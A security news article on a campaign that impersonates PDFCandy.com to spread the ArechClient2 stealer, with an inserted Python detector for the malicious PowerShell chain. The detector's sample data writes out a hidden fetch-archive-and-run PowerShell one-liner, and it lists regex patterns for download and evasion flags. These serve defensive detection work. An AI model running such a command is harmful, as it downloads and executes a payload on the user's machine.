CloudSEK recently uncovered a sophisticated malware campaign that targets users by impersonating the popular online file conversion tool, PDFCandy.com. The attackers behind this campaign are distributing the ArechClient2 information stealer, malware designed to harvest private data such as browser usernames and passwords. This malware belongs to the SectopRAT family and has been active since 2019, spreading through deceptive online advertising and fake software updates.
According to the research shared with Hackread.com by CloudSEK, the attackers have created a fake PDF to DOCX converter that closely resembles the legitimate PDFCandy.com website. They have gone to great lengths to replicate the look and feel of the real website, including using similar web addresses and mimicking the user interface. This elaborate scheme is aimed at tricking unsuspecting users into uploading their files for conversion.
Once a user lands on one of these fake sites and uploads a PDF file, they are prompted to verify a CAPTCHA, similar to what legitimate websites use for security purposes. This step is crucial as it marks the transition from social engineering tactics to system compromise. By introducing the CAPTCHA, the attackers make the fake site appear more legitimate and encourage users to proceed without questioning the authenticity of the website.
After passing the CAPTCHA verification, users are instructed to run a command using Windows’ built-in tool PowerShell, which leads to the system compromise. Analysis of the command reveals a series of redirects that ultimately lead to a malicious file named “adobe.zip” hosted on a suspicious domain flagged by multiple security services. This file contains a folder with an executable file called “audiobitexe”, which is used to launch the ArechClient2 malware.
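The chain described above (a user pastes a PowerShell command that downloads an archive, unpacks it and launches an executable) leaves a recognisable footprint in process-creation telemetry. The following is an added defender-side example, not code from CloudSEK or Hackread: it scores constructed PowerShell command-line records for those hallmarks. The sample records, the `.invalid` domain and every file name except adobe.zip are assumptions made for the example.

```python
import re

# Constructed sample records shaped like PowerShell process-creation telemetry
# (parent process, user, full command line). Invented for this example; they are
# not indicators from the CloudSEK report.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "user": "alice",
     "cmd": 'powershell -w hidden -c "iwr https://cdn.example.invalid/x -OutFile '
            '$env:TEMP\\adobe.zip; Expand-Archive $env:TEMP\\adobe.zip $env:TEMP\\a; '
            'Start-Process $env:TEMP\\a\\payload.exe"'},
    {"parent": "code.exe", "user": "bob",
     "cmd": 'powershell -NoProfile -Command "Get-ChildItem C:\\repo -Recurse | Measure-Object"'},
    {"parent": "explorer.exe", "user": "carol",
     "cmd": 'powershell -Command "Get-Date"'},
]

# Each pattern covers one stage of the chain the article describes.
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadfile|downloadstring|start-bitstransfer)\b", re.I)
ARCHIVE = re.compile(r"\b(expand-archive|extracttodirectory)\b", re.I)
EXECUTE = re.compile(r"(\bstart-process\b|\biex\b|\binvoke-expression\b|\.exe\b)", re.I)
EVASION = re.compile(r"(-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|-enc(odedcommand)?\b)", re.I)


def score_event(ev):
    """Return (score, reasons) for one record.

    One point per stage present, plus one if PowerShell was started interactively
    from explorer.exe (Run dialog or shell), which is how a pasted command from a
    web page typically shows up rather than as a child of a scheduler or installer.
    """
    reasons = []
    if ev["parent"].lower() == "explorer.exe":
        reasons.append("interactive launch from explorer.exe")
    for name, rx in (("download", DOWNLOAD), ("archive", ARCHIVE),
                     ("execute", EXECUTE), ("evasion", EVASION)):
        if rx.search(ev["cmd"]):
            reasons.append(name)
    return len(reasons), reasons


def flag_events(events, threshold=3):
    """Return the users whose records reach the threshold (default: three stages)."""
    return [ev["user"] for ev in events if score_event(ev)[0] >= threshold]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["user"], score_event(ev))
    print("flagged:", flag_events(SAMPLE_EVENTS))
```

An interactive launch alone (carol) scores 1 and is not flagged; the threshold is what keeps ordinary PowerShell use from paging an analyst.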
It is important to note that the FBI issued a warning on March 17, 2025, regarding malicious online file converters being used to distribute harmful software. The agency highlighted the risks associated with using free document converters or downloader tools and advised users to exercise caution when using online file conversion services, verify website legitimacy before uploading files, pay attention to URLs, and be wary of unexpected prompts.
In conclusion, the PDFCandy.com impersonation campaign highlights the importance of staying vigilant online and being cautious of deceptive tactics used by cybercriminals. By taking simple steps to verify the legitimacy of websites and being mindful of unusual prompts, users can protect themselves from falling victim to malware attacks disguised as legitimate tools and services.